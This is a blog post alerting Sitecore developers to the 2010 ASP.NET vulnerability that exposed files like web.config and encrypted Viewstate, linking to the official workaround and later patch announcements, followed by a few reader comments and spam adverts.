ANOTHER UPDATE: Sitecore released a fix last Friday on SDN.
UPDATE: A FAQ that details more about the workaround and the vulnerability was released on Sep 20.
Yes. You read that right. Essentially, by doing some queries on the server that has an ASP.NET-based Website/app, a hacker can eventually figure out how to download restricted files like web.config and even be able to determine the server’s cipher text and decrypt your site’s Viewstate or other encrypted data you may have.
I’m posting this here because Sitecore is obviously ASP.NET-based. So, here’s the post form Scott Guthrie on the workaround and more information about the vulnerability. Spread it around and let’s make sure our community is safe and keep Sitecore’s integrity intact (even though this is not even about Sitecore). You know how that works : ).
http://weblogs.asp.net/scottgu/archive/2010/09/18/important-asp-net-security-vulnerability.aspx
Hi,
ReplyDeletebut the problem with a solution is that is advice to use customErrors with default Redirect.
I have tried with fix and unfortunately it still generated unique url for unique page.
Any advices here?
Hello Szymon,
ReplyDeleteI'm not entirely sure what you mean by "it still generated unique url for unique page". Can you elaborate more? Are you using ASP.NET 3.5/4.0? Do you have elements in your customErrors? Is your error page a Web form or static HTML file?
Yesterday Microsoft released a security update that addresses the ASP.NET Security Vulnerability http://bit.ly/ceTwHz
ReplyDeleteEcorptrainings.com provides sitecore in hyderabad with best faculties on real time projects. We give the best online trainingamong the sitecore in Hyderabad.
ReplyDeleteClassroom Training in Hyderabad India
Thanks for all the information, it was very helpful I really like that you are providing information......................Please contact us for Oracle Fusion HCM Training details in our Erptree Training Institute
ReplyDelete